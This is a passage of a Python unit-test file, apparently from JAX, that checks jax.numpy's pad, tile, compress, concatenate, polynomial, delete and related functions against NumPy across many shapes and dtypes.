        ('edge', nonempty_shapes),
    ]
    for shape, dtype in _shape_and_dtypes(shapes, all_dtypes)
    for constant_values in [
        # None is used for modes other than 'constant'
        None,
        # constant
        0, 1,
        # (constant,)
        (0,), (2.718,),
        # ((before_const, after_const),)
        ((0, 2),), ((-1, 3.14),),
        # ((before_1, after_1), ..., (before_N, after_N))
        tuple((i / 2, -3.14 * i) for i in range(len(shape))),
    ]
    for pad_width in [
        # ((before_1, after_1), ..., (before_N, after_N))
        tuple((i % 3, (i + 1) % 3) for i in range(len(shape))),
        # ((before, after),)
        ((1, 2),), ((2, 0),),
        # (before, after)  (not in the docstring but works in numpy)
        (2, 0), (0, 0),
        # (pad,)
        (1,), (2,),
        # pad
        0, 1,
    ]
    if (pad_width != () and constant_values != () and
        ((mode == 'constant' and constant_values is not None) or
         (mode != 'constant' and constant_values is None)))))
def testPad(self, shape, dtype, mode, pad_width, constant_values):
  """Check jnp.pad against np.pad for 'constant', 'wrap', and 'edge' modes."""
  rng = jtu.rand_default(self.rng())
  args_maker = lambda: [rng(shape, dtype)]
  # constant_values may only be passed for mode='constant'.
  if constant_values is None:
    np_fun = partial(np.pad, pad_width=pad_width, mode=mode)
    jnp_fun = partial(jnp.pad, pad_width=pad_width, mode=mode)
  else:
    np_fun = partial(np.pad, pad_width=pad_width, mode=mode,
                     constant_values=constant_values)
    jnp_fun = partial(jnp.pad, pad_width=pad_width, mode=mode,
                      constant_values=constant_values)
  self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker,
                          check_dtypes=shape is not jtu.PYTHON_SCALAR_SHAPE)
  self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "_shape={}_mode={}_pad_width={}_stat_length={}".format(
        jtu.format_shape_dtype_string(shape, dtype), mode, pad_width, stat_length),
     "shape": shape, "dtype": dtype, "mode": mode, "pad_width": pad_width,
     "stat_length": stat_length}
    for mode in ['maximum', 'minimum', 'mean', 'median']
    for shape, dtype in _shape_and_dtypes(nonempty_shapes, all_dtypes)
    for pad_width in [
        # ((before_1, after_1), ..., (before_N, after_N))
        tuple((i % 3, (i + 1) % 3) for i in range(len(shape))),
        # ((before, after),)
        ((1, 2),), ((2, 0),),
        # (before, after)  (not in the docstring but works in numpy)
        (2, 0), (0, 0),
        # (pad,)
        (1,), (2,),
        # pad
        0, 1,
    ]
    for stat_length in [
        None,
        # ((before_1, after_1), ..., (before_N, after_N))
        tuple(((i % 3 + 1), ((i + 1) % 3) + 1) for i in range(len(shape))),
        # ((before, after),)
        ((1, 2),), ((2, 2),),
        # (before, after)  (not in the docstring but works in numpy)
        (1, 1), (3, 4),
        # (pad,)
        (1,), (2,),
        # pad
        1, 2
    ]
    if (pad_width != () and stat_length != () and
        not (dtype in bool_dtypes and mode == 'mean'))))
def testPadStatValues(self, shape, dtype, mode, pad_width, stat_length):
  """Check jnp.pad against np.pad for the statistic-based modes."""
  rng = jtu.rand_default(self.rng())
  args_maker = lambda: [rng(shape, dtype)]
  np_fun = partial(np.pad, pad_width=pad_width, mode=mode, stat_length=stat_length)
  jnp_fun = partial(jnp.pad, pad_width=pad_width, mode=mode, stat_length=stat_length)
  self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker,
                          check_dtypes=shape is not jtu.PYTHON_SCALAR_SHAPE)
  self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "_shape={}_mode={}_pad_width={}_reflect_type={}".format(
        jtu.format_shape_dtype_string(shape, dtype), mode, pad_width, reflect_type),
     "shape": shape, "dtype": dtype, "mode": mode, "pad_width": pad_width,
     "reflect_type": reflect_type}
    for mode in ['symmetric', 'reflect']
    for shape, dtype in _shape_and_dtypes(nonempty_shapes, all_dtypes)
    for pad_width in [
        # ((before_1, after_1), ..., (before_N, after_N))
        tuple((i % 3, (i + 1) % 3) for i in range(len(shape))),
        # ((before, after),)
        ((1, 2),), ((2, 3),),
        # (before, after)  (not in the docstring but works in numpy)
        (2, 1), (1, 2),
        # (pad,)
        (1,), (2,), (3,),
        # pad
        0, 5, 7, 10
    ]
    for reflect_type in ['even', 'odd']
    if (pad_width != () and
        # following types lack precision when calculating odd values
        (reflect_type != 'odd' or dtype not in [np.bool_, np.float16, jnp.bfloat16]))))
def testPadSymmetricAndReflect(self, shape, dtype, mode, pad_width, reflect_type):
  """Check jnp.pad against np.pad for 'symmetric' and 'reflect' modes."""
  rng = jtu.rand_default(self.rng())
  args_maker = lambda: [rng(shape, dtype)]
  np_fun = partial(np.pad, pad_width=pad_width, mode=mode, reflect_type=reflect_type)
  jnp_fun = partial(jnp.pad, pad_width=pad_width, mode=mode, reflect_type=reflect_type)
  self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker,
                          check_dtypes=shape is not jtu.PYTHON_SCALAR_SHAPE,
                          tol={np.float32: 1e-3, np.complex64: 1e-3})
  self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "_shape={}_mode={}_pad_width={}_end_values={}".format(
        jtu.format_shape_dtype_string(shape, dtype), "linear_ramp", pad_width, end_values),
     "shape": shape, "dtype": dtype, "pad_width": pad_width,
     "end_values": end_values}
    for shape, dtype in _shape_and_dtypes(nonempty_shapes, all_dtypes)
    for pad_width in [
        # ((before_1, after_1), ..., (before_N, after_N))
        tuple((i % 3, (i + 1) % 3) for i in range(len(shape))),
        # ((before, after),)
        ((1, 2),), ((2, 0),),
        # (before, after)  (not in the docstring but works in numpy)
        (2, 0), (0, 0),
        # (pad,)
        (1,), (2,),
        # pad
        0, 1,
    ]
    for end_values in [
        # ((before_1, after_1), ..., (before_N, after_N))
        tuple((i % 3, (i + 1) % 3) for i in range(len(shape))),
        # ((before, after),)
        ((1, 2),), ((2.0, 3.14),),
        # (before, after)  (not in the docstring but works in numpy)
        (0, 0), (-8.0, 2.0),
        # (end_values,)
        (1,), (2,),
        # end_values
        0, 1, 100, 10.0, 3.5, 4.2, -5, -3
    ]
    if (pad_width != () and end_values != () and
        # following types lack precision
        dtype not in [np.int8, np.int16, np.float16, jnp.bfloat16])))
def testPadLinearRamp(self, shape, dtype, pad_width, end_values):
  """Check jnp.pad against np.pad for the 'linear_ramp' mode."""
  if numpy_version < (1, 20) and np.issubdtype(dtype, np.integer):
    raise unittest.SkipTest("NumPy 1.20 changed the semantics of np.linspace")
  rng = jtu.rand_default(self.rng())
  args_maker = lambda: [rng(shape, dtype)]
  np_fun = partial(np.pad, pad_width=pad_width, mode="linear_ramp",
                   end_values=end_values)
  jnp_fun = partial(jnp.pad, pad_width=pad_width, mode="linear_ramp",
                    end_values=end_values)
  self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker,
                          check_dtypes=shape is not jtu.PYTHON_SCALAR_SHAPE)
  self._CompileAndCheck(jnp_fun, args_maker)
def testPadEmpty(self):
  """mode='empty' padding must match NumPy's shape and keep the interior."""
  arr = np.arange(6).reshape(2, 3)
  pad_width = ((2, 3), (3, 1))
  np_res = np.pad(arr, pad_width=pad_width, mode="empty")
  jnp_res = jnp.pad(arr, pad_width=pad_width, mode="empty")
  np.testing.assert_equal(np_res.shape, jnp_res.shape)
  # Only the interior is defined for 'empty'; padded cells are arbitrary.
  interior = (slice(2, -3), slice(3, -1))
  np.testing.assert_equal(arr, np_res[interior])
  np.testing.assert_equal(arr, jnp_res[interior])
  np.testing.assert_equal(np_res[interior], jnp_res[interior])
def testPadKwargs(self):
  """Each pad mode must accept its own kwargs and reject other modes' kwargs."""
  # Maps each supported mode to the keyword arguments it accepts.
  modes = {
      'constant': {'constant_values': 0},
      'edge': {},
      'linear_ramp': {'end_values': 0},
      'maximum': {'stat_length': None},
      'mean': {'stat_length': None},
      'median': {'stat_length': None},
      'minimum': {'stat_length': None},
      'reflect': {'reflect_type': 'even'},
      'symmetric': {'reflect_type': 'even'},
      'wrap': {},
      'empty': {}
  }
  arr = jnp.array([1, 2, 3])
  pad_width = 1
  for mode in modes.keys():
    allowed = modes[mode]
    # Collect every kwarg belonging to some *other* mode.
    not_allowed = {}
    for kwargs in modes.values():
      if kwargs != allowed:
        not_allowed.update(kwargs)
    # Test if allowed keyword arguments pass
    jnp.pad(arr, pad_width, mode, **allowed)
    # Test if prohibited keyword arguments of other modes raise an error
    match = "unsupported keyword arguments for mode '{}'".format(mode)
    for key, value in not_allowed.items():
      with self.assertRaisesRegex(ValueError, match):
        jnp.pad(arr, pad_width, mode, **{key: value})
  # Test if unsupported mode raise error.
  unsupported_modes = [1, None, "foo"]
  for mode in unsupported_modes:
    match = "Unimplemented padding mode '{}' for np.pad.".format(mode)
    with self.assertRaisesRegex(NotImplementedError, match):
      jnp.pad(arr, pad_width, mode)
def testPadFunction(self):
  """jnp.pad must support a callable mode, matching np.pad's protocol."""
  def np_pad_with(vector, pad_width, iaxis, kwargs):
    # NumPy's pad callback mutates the 1-D vector in place (no return).
    pad_value = kwargs.get('padder', 10)
    vector[:pad_width[0]] = pad_value
    vector[-pad_width[1]:] = pad_value
  def jnp_pad_with(vector, pad_width, iaxis, kwargs):
    # JAX arrays are immutable, so the callback returns an updated copy.
    pad_value = kwargs.get('padder', 10)
    vector = jax.ops.index_update(
        vector, jax.ops.index[:pad_width[0]], pad_value)
    vector = jax.ops.index_update(
        vector, jax.ops.index[-pad_width[1]:], pad_value)
    return vector
  arr = np.arange(6).reshape(2, 3)
  np_res = np.pad(arr, 2, np_pad_with)
  jnp_res = jnp.pad(arr, 2, jnp_pad_with)
  np.testing.assert_equal(np_res, jnp_res)
  # Extra keyword arguments (padder=...) are forwarded to the callback.
  arr = np.arange(24).reshape(2, 3, 4)
  np_res = np.pad(arr, 1, np_pad_with, padder=100)
  jnp_res = jnp.pad(arr, 1, jnp_pad_with, padder=100)
  np.testing.assert_equal(np_res, jnp_res)
  rng = jtu.rand_default(self.rng())
  args_maker = lambda: [rng(arr.shape, arr.dtype)]
  jnp_fun = partial(jnp.pad, pad_width=1, mode=jnp_pad_with)
  self._CompileAndCheck(jnp_fun, args_maker)
def testPadWithNumpyPadWidth(self):
  """jnp.pad must accept a NumPy array as pad_width, including under jit."""
  a = jnp.array([1, 2, 3, 4, 5])
  pad_kwargs = dict(pad_width=np.asarray((2, 3)), mode="constant",
                    constant_values=(4, 6))
  jitted_pad = jax.jit(partial(jnp.pad, **pad_kwargs))
  expected = np.pad(a, **pad_kwargs)
  np.testing.assert_array_equal(jitted_pad(a), expected)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "_shape=[{}]_reps={}".format(
        jtu.format_shape_dtype_string(shape, dtype), reps),
     "shape": shape, "dtype": dtype, "reps": reps}
    for reps in [(), (2,), (3, 4), (2, 3, 4), (1, 0, 2)]
    for shape, dtype in _shape_and_dtypes(all_shapes, default_dtypes)
    ))
def testTile(self, shape, dtype, reps):
  """Check jnp.tile against np.tile, including empty and zero-sized reps."""
  rng = jtu.rand_default(self.rng())
  np_fun = lambda arg: np.tile(arg, reps)
  jnp_fun = lambda arg: jnp.tile(arg, reps)
  args_maker = lambda: [rng(shape, dtype)]
  self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker,
                          check_dtypes=shape is not jtu.PYTHON_SCALAR_SHAPE)
  self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "_shape={}".format(
        jtu.format_shape_dtype_string(shape, dtype)),
     "shape": shape, "dtype": dtype}
    for shape in all_shapes
    for dtype in all_dtypes))
def testExtract(self, shape, dtype):
  """Check jnp.extract against np.extract."""
  # rand_some_zero ensures the float32 condition array has genuine zeros.
  rng = jtu.rand_some_zero(self.rng())
  def args_maker():
    return [rng(shape, jnp.float32), rng(shape, dtype)]
  self._CheckAgainstNumpy(np.extract, jnp.extract, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "_{}_ncond={}_nfunc={}".format(
        jtu.format_shape_dtype_string(shape, dtype), ncond, nfunc),
     "shape": shape, "dtype": dtype, "ncond": ncond, "nfunc": nfunc}
    for ncond in [1, 2, 3]
    for nfunc in [ncond, ncond + 1]
    for shape in all_shapes
    for dtype in all_dtypes))
def testPiecewise(self, shape, dtype, ncond, nfunc):
  """Check jnp.piecewise against np.piecewise."""
  rng = jtu.rand_default(self.rng())
  rng_bool = jtu.rand_int(self.rng(), 0, 2)
  # funclist mixes callables and scalar constants, truncated to nfunc entries.
  funclist = [lambda x: x - 1, 1, lambda x: x, 0][:nfunc]
  args_maker = lambda: (rng(shape, dtype), [rng_bool(shape, bool) for i in range(ncond)])
  np_fun = partial(np.piecewise, funclist=funclist)
  jnp_fun = partial(jnp.piecewise, funclist=funclist)
  self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker, check_dtypes=True)
  # This is a higher-order function, so the cache miss check will fail.
  self._CompileAndCheck(jnp_fun, args_maker, check_dtypes=True, check_cache_misses=False)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "{}_perm={}_{}".format(
        jtu.format_shape_dtype_string(shape, dtype), perm, arg_type),
     "dtype": dtype, "shape": shape, "perm": perm, "arg_type": arg_type}
    for dtype in default_dtypes
    for shape in array_shapes
    for arg_type in ["splat", "value"]
    for perm in [None, tuple(np.random.RandomState(0).permutation(np.zeros(shape).ndim))]))
def testTransposeTuple(self, shape, dtype, perm, arg_type):
  """transpose() must accept a permutation as one tuple or splatted args."""
  rng = jtu.rand_some_zero(self.rng())
  args_maker = lambda: [rng(shape, dtype)]
  if arg_type == "value":
    np_fun = lambda x: x.transpose(perm)
    jnp_fun = lambda x: jnp.array(x).transpose(perm)
  else:
    # "splat": pass the permutation as separate positional arguments.
    np_fun = lambda x: x.transpose(*(perm or ()))
    jnp_fun = lambda x: jnp.array(x).transpose(*(perm or ()))
  self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker, check_dtypes=True)
  self._CompileAndCheck(jnp_fun, args_maker, check_dtypes=True)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "{}_trim={}".format(
        jtu.format_shape_dtype_string(a_shape, dtype), trim),
     "dtype": dtype, "a_shape": a_shape, "trim": trim}
    for dtype in default_dtypes
    for a_shape in one_dim_array_shapes
    for trim in ["f", "b", "fb"]))
def testTrimZeros(self, a_shape, dtype, trim):
  """Check jnp.trim_zeros against np.trim_zeros for each trim mode."""
  rng = jtu.rand_some_zero(self.rng())
  def args_maker():
    return [rng(a_shape, dtype)]
  def np_fun(arr):
    return np.trim_zeros(arr, trim)
  def jnp_fun(arr):
    return jnp.trim_zeros(arr, trim)
  self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker, check_dtypes=True)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "_shape={}_rank{}".format(
        jtu.format_shape_dtype_string(a_shape, dtype), rank),
     "dtype": dtype, "a_shape": a_shape, "rank": rank}
    for rank in (1, 2)
    for dtype in default_dtypes
    for a_shape in one_dim_array_shapes))
def testPoly(self, a_shape, dtype, rank):
  """Check jnp.poly against np.poly for 1-D roots and 2-D square inputs."""
  if dtype in (np.float16, jnp.bfloat16, np.int16):
    self.skipTest(f"{dtype} gets promoted to {np.float16}, which is not supported.")
  elif rank == 2 and jtu.device_under_test() in ("tpu", "gpu"):
    self.skipTest("Nonsymmetric eigendecomposition is only implemented on the CPU backend.")
  rng = jtu.rand_default(self.rng())
  tol = { np.int8: 1e-3, np.int32: 1e-3, np.float32: 1e-3, np.float64: 1e-6 }
  if jtu.device_under_test() == "tpu":
    tol[np.int32] = tol[np.float32] = 1e-1
  tol = jtu.tolerance(dtype, tol)
  # a_shape * rank: (n,) when rank==1, (n, n) when rank==2 (square matrix).
  args_maker = lambda: [rng(a_shape * rank, dtype)]
  self._CheckAgainstNumpy(np.poly, jnp.poly, args_maker, check_dtypes=False, tol=tol)
  self._CompileAndCheck(jnp.poly, args_maker, check_dtypes=True, rtol=tol, atol=tol)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "a_shape={} , b_shape={}".format(
        jtu.format_shape_dtype_string(a_shape, dtype),
        jtu.format_shape_dtype_string(b_shape, dtype)),
     "dtype": dtype, "a_shape": a_shape, "b_shape" : b_shape}
    for dtype in default_dtypes
    for a_shape in one_dim_array_shapes
    for b_shape in one_dim_array_shapes))
def testPolyAdd(self, a_shape, b_shape, dtype):
  """Check jnp.polyadd against np.polyadd on 1-D coefficient arrays."""
  rng = jtu.rand_default(self.rng())
  def args_maker():
    return [rng(a_shape, dtype), rng(b_shape, dtype)]
  self._CheckAgainstNumpy(np.polyadd, jnp.polyadd, args_maker,
                          check_dtypes=True)
  self._CompileAndCheck(jnp.polyadd, args_maker, check_dtypes=True)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "a_shape={} , b_shape={}".format(
        jtu.format_shape_dtype_string(a_shape, dtype),
        jtu.format_shape_dtype_string(b_shape, dtype)),
     "dtype": dtype, "a_shape": a_shape, "b_shape" : b_shape}
    for dtype in default_dtypes
    for a_shape in one_dim_array_shapes
    for b_shape in one_dim_array_shapes))
def testPolySub(self, a_shape, b_shape, dtype):
  """Check jnp.polysub against np.polysub on 1-D coefficient arrays."""
  rng = jtu.rand_default(self.rng())
  np_fun = lambda arg1, arg2: np.polysub(arg1, arg2)
  jnp_fun = lambda arg1, arg2: jnp.polysub(arg1, arg2)
  args_maker = lambda: [rng(a_shape, dtype), rng(b_shape, dtype)]
  self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker, check_dtypes=True)
  self._CompileAndCheck(jnp_fun, args_maker, check_dtypes=True)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "_shape={}_order={}_k={}".format(
        jtu.format_shape_dtype_string(a_shape, dtype),
        order, k),
     "dtype": dtype, "a_shape": a_shape, "order" : order, "k": k}
    for dtype in default_dtypes
    for a_shape in one_dim_array_shapes
    for order in range(5)
    for k in [np.arange(order, dtype=dtype), np.ones(1, dtype), None]))
def testPolyInt(self, a_shape, order, k, dtype):
  """Check jnp.polyint against np.polyint for orders 0-4 and various k."""
  rng = jtu.rand_default(self.rng())
  np_fun = lambda arg1: np.polyint(arg1, m=order, k=k)
  jnp_fun = lambda arg1: jnp.polyint(arg1, m=order, k=k)
  args_maker = lambda: [rng(a_shape, dtype)]
  self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker, check_dtypes=False)
  self._CompileAndCheck(jnp_fun, args_maker, check_dtypes=True)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "_shape={}_order={}".format(
        jtu.format_shape_dtype_string(a_shape, dtype),
        order),
     "dtype": dtype, "a_shape": a_shape, "order" : order}
    for dtype in default_dtypes
    for a_shape in one_dim_array_shapes
    for order in range(5)))
def testPolyDer(self, a_shape, order, dtype):
  """Check jnp.polyder against np.polyder for derivative orders 0-4."""
  rng = jtu.rand_default(self.rng())
  np_fun = lambda arg1: np.polyder(arg1, m=order)
  jnp_fun = lambda arg1: jnp.polyder(arg1, m=order)
  args_maker = lambda: [rng(a_shape, dtype)]
  self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker, check_dtypes=False)
  self._CompileAndCheck(jnp_fun, args_maker, check_dtypes=True)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "_ptype={}".format(ptype), "ptype": ptype}
    for ptype in ['int', 'np.int', 'jnp.int']))
def testIntegerPower(self, ptype):
  """A static integer exponent must lower to a single integer_pow_p eqn."""
  p = {'int': 2, 'np.int': np.int32(2), 'jnp.int': jnp.int32(2)}[ptype]
  jaxpr = api.make_jaxpr(partial(jnp.power, x2=p))(1)
  eqns = jaxpr.jaxpr.eqns
  self.assertLen(eqns, 1)
  self.assertEqual(eqns[0].primitive, lax.integer_pow_p)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "_x={}_y={}".format(x, y), "x": x, "y": y}
    for x in [-1, 0, 1]
    for y in [0, 32, 64, 128]))
def testIntegerPowerOverflow(self, x, y):
  """Large integer exponents must match NumPy.

  Regression test for https://github.com/google/jax/issues/5987.
  """
  def args_maker():
    return [x, y]
  self._CheckAgainstNumpy(np.power, jnp.power, args_maker)
  self._CompileAndCheck(jnp.power, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "_shape={}_axis={}".format(
        jtu.format_shape_dtype_string(shape, dtype), axis),
     "shape": shape, "dtype": dtype, "axis": axis}
    for shape in all_shapes
    for dtype in all_dtypes
    for axis in [None] + list(range(len(shape)))))
def testCompress(self, shape, dtype, axis):
  """Check jnp.compress against np.compress."""
  rng = jtu.rand_some_zero(self.rng())
  # Condition length follows the compressed dimension: empty for scalars,
  # the flattened size when axis is None, else the size along `axis`.
  if shape in scalar_shapes or len(shape) == 0:
    cond_shape = (0,)
  elif axis is None:
    cond_shape = (prod(shape),)
  else:
    cond_shape = (shape[axis],)
  args_maker = lambda: [rng(cond_shape, jnp.float32), rng(shape, dtype)]
  np_fun = partial(np.compress, axis=axis)
  jnp_fun = partial(jnp.compress, axis=axis)
  self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "_shape={}_condition=array[{}]_axis={}".format(
        jtu.format_shape_dtype_string(shape, dtype), len(condition), axis),
     "shape": shape, "dtype": dtype, "condition": condition, "axis": axis}
    for shape in [(2, 3)]
    for dtype in int_dtypes
    # condition entries beyond axis size must be zero.
    for condition in [[1], [1, 0, 0, 0, 0, 0, 0]]
    for axis in [None, 0, 1]))
def testCompressMismatchedShapes(self, shape, dtype, condition, axis):
  """compress must accept condition arrays shorter/longer than the axis."""
  rng = jtu.rand_default(self.rng())
  args_maker = lambda: [np.array(condition), rng(shape, dtype)]
  np_fun = partial(np.compress, axis=axis)
  jnp_fun = partial(jnp.compress, axis=axis)
  self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "_shape={}_axis={}".format(
        jtu.format_shape_dtype_string(shape, dtype), axis),
     "shape": shape, "dtype": dtype, "axis": axis}
    for shape in array_shapes
    for dtype in all_dtypes
    for axis in [None] + list(range(len(shape)))))
def testCompressMethod(self, shape, dtype, axis):
  """Check the ndarray .compress() method against np.compress."""
  rng = jtu.rand_some_zero(self.rng())
  # Condition length follows the compressed dimension (see testCompress).
  if shape in scalar_shapes or len(shape) == 0:
    cond_shape = (0,)
  elif axis is None:
    cond_shape = (prod(shape),)
  else:
    cond_shape = (shape[axis],)
  args_maker = lambda: [rng(cond_shape, jnp.float32), rng(shape, dtype)]
  np_fun = lambda condition, x: np.compress(condition, x, axis=axis)
  jnp_fun = lambda condition, x: x.compress(condition, axis=axis)
  self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "_axis={}_baseshape=[{}]_dtypes=[{}]".format(
        axis, ",".join(str(d) for d in base_shape),
        ",".join(np.dtype(dtype).name for dtype in arg_dtypes)),
     "axis": axis, "base_shape": base_shape, "arg_dtypes": arg_dtypes}
    for num_arrs in [3]
    for arg_dtypes in itertools.combinations_with_replacement(default_dtypes, num_arrs)
    for base_shape in [(4,), (3, 4), (2, 3, 4)]
    for axis in range(-len(base_shape)+1, len(base_shape))))
def testConcatenate(self, axis, base_shape, arg_dtypes):
  """Check jnp.concatenate against NumPy across mixed dtypes."""
  rng = jtu.rand_default(self.rng())
  wrapped_axis = axis % len(base_shape)
  # Vary the size of the concatenated dimension across operands (3, 1, 4).
  shapes = [base_shape[:wrapped_axis] + (size,) + base_shape[wrapped_axis+1:]
            for size, _ in zip(itertools.cycle([3, 1, 4]), arg_dtypes)]
  def np_fun(*args):
    # Upcast bfloat16 inputs to float32 for NumPy, then cast the result to
    # the dtype obtained by promoting all argument dtypes.
    args = [x if x.dtype != jnp.bfloat16 else x.astype(np.float32)
            for x in args]
    dtype = functools.reduce(jnp.promote_types, arg_dtypes)
    return np.concatenate(args, axis=axis).astype(dtype)
  jnp_fun = lambda *args: jnp.concatenate(args, axis=axis)
  def args_maker():
    return [rng(shape, dtype) for shape, dtype in zip(shapes, arg_dtypes)]
  self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
  self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "_{}_axis={}".format(
        jtu.format_shape_dtype_string(shape, dtype), axis),
     "shape": shape, "dtype": dtype, "axis": axis}
    for shape in [(4, 1), (4, 3), (4, 5, 6)]
    for dtype in all_dtypes
    for axis in [None] + list(range(1 - len(shape), len(shape) - 1))))
def testConcatenateArray(self, shape, dtype, axis):
  """concatenate must accept a single array (concatenating its leading axis)."""
  rng = jtu.rand_default(self.rng())
  args_maker = lambda: [rng(shape, dtype)]
  np_fun = lambda x: np.concatenate(x, axis=axis)
  jnp_fun = lambda x: jnp.concatenate(x, axis=axis)
  self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
  self._CompileAndCheck(jnp_fun, args_maker)
def testConcatenateAxisNone(self):
  """axis=None with differently-shaped operands must not raise.

  Regression test for https://github.com/google/jax/issues/3419.
  """
  first = jnp.array([[1, 2], [3, 4]])
  second = jnp.array([[5]])
  jnp.concatenate((first, second), axis=None)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "_axis={}_baseshape=[{}]_dtypes=[{}]".format(
        axis, ",".join(str(d) for d in base_shape),
        ",".join(np.dtype(dtype).name for dtype in arg_dtypes)),
     "axis": axis, "base_shape": base_shape, "arg_dtypes": arg_dtypes}
    for arg_dtypes in itertools.combinations_with_replacement(default_dtypes, 2)
    for base_shape in [(4,), (3, 4), (2, 3, 4)]
    for axis in range(-len(base_shape)+1, len(base_shape))))
def testAppend(self, axis, base_shape, arg_dtypes):
  """Check jnp.append against NumPy across mixed dtype pairs."""
  rng = jtu.rand_default(self.rng())
  wrapped_axis = axis % len(base_shape)
  # Vary the size of the appended dimension across the two operands.
  shapes = [base_shape[:wrapped_axis] + (size,) + base_shape[wrapped_axis+1:]
            for size, _ in zip(itertools.cycle([3, 1, 4]), arg_dtypes)]
  def np_fun(arr, values):
    # Upcast bfloat16 to float32 for NumPy, then cast the result to the
    # dtype obtained by promoting the two argument dtypes.
    arr = arr.astype(np.float32) if arr.dtype == jnp.bfloat16 else arr
    values = (values.astype(np.float32) if values.dtype == jnp.bfloat16
              else values)
    out = np.append(arr, values, axis=axis)
    return out.astype(jnp.promote_types(*arg_dtypes))
  jnp_fun = lambda arr, values: jnp.append(arr, values, axis=axis)
  def args_maker():
    return [rng(shape, dtype) for shape, dtype in zip(shapes, arg_dtypes)]
  self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
  self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "_{}_axis={}_idx={}".format(
        jtu.format_shape_dtype_string(shape, dtype), axis, idx),
     "dtype": dtype, "shape": shape, "axis": axis, "idx": idx}
    for shape in nonempty_nonscalar_array_shapes
    for dtype in all_dtypes
    for axis in [None] + list(range(-len(shape), len(shape)))
    for idx in (range(-prod(shape), prod(shape))
                if axis is None else
                range(-shape[axis], shape[axis]))))
def testDeleteInteger(self, shape, dtype, idx, axis):
  """Check jnp.delete against np.delete for a single integer index."""
  rng = jtu.rand_default(self.rng())
  args_maker = lambda: [rng(shape, dtype)]
  np_fun = lambda arg: np.delete(arg, idx, axis=axis)
  jnp_fun = lambda arg: jnp.delete(arg, idx, axis=axis)
  self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
  self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "_{}_axis={}_slc={}".format(
        jtu.format_shape_dtype_string(shape, dtype), axis, slc),
     "dtype": dtype, "shape": shape, "axis": axis, "slc": slc}
    for shape in nonempty_nonscalar_array_shapes
    for dtype in all_dtypes
    for axis in [None] + list(range(-len(shape), len(shape)))
    for slc in [slice(None), slice(1, 3), slice(1, 5, 2)]))
def testDeleteSlice(self, shape, dtype, axis, slc):
  """Check jnp.delete against np.delete for slice indices."""
  rng = jtu.rand_default(self.rng())
  args_maker = lambda: [rng(shape, dtype)]
  np_fun = lambda arg: np.delete(arg, slc, axis=axis)
  jnp_fun = lambda arg: jnp.delete(arg, slc, axis=axis)
  self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
  self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "_{}_axis={}_idx={}".format(
        jtu.format_shape_dtype_string(shape, dtype), axis,
        jtu.format_shape_dtype_string(idx_shape, int)),
     "dtype": dtype, "shape": shape, "axis": axis, "idx_shape": idx_shape}
    for shape in nonempty_nonscalar_array_shapes
    for dtype in all_dtypes
    for axis in [None] + list(range(-len(shape), len(shape)))
    for idx_shape in all_shapes))
def testDeleteIndexArray(self, shape, dtype, axis, idx_shape):
  """Check jnp.delete against np.delete for integer index arrays."""
  rng = jtu.rand_default(self.rng())
  # Valid index range is bounded by the flattened size (axis=None) or the
  # size along `axis`.
  max_idx = np.zeros(shape).size if axis is None else np.zeros(shape).shape[axis]
  # Previous to numpy 1.19, negative indices were ignored so we don't test this.
  low = 0 if numpy_version < (1, 19, 0) else -max_idx
  idx = jtu.rand_int(self.rng(), low=low, high=max_idx)(idx_shape, int)
  args_maker = lambda: [rng(shape, dtype)]
  np_fun = lambda arg: np.delete(arg, idx, axis=axis)
  jnp_fun = lambda arg: jnp.delete(arg, idx, axis=axis)
  self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
  self._CompileAndCheck(jnp_fun, args_maker)
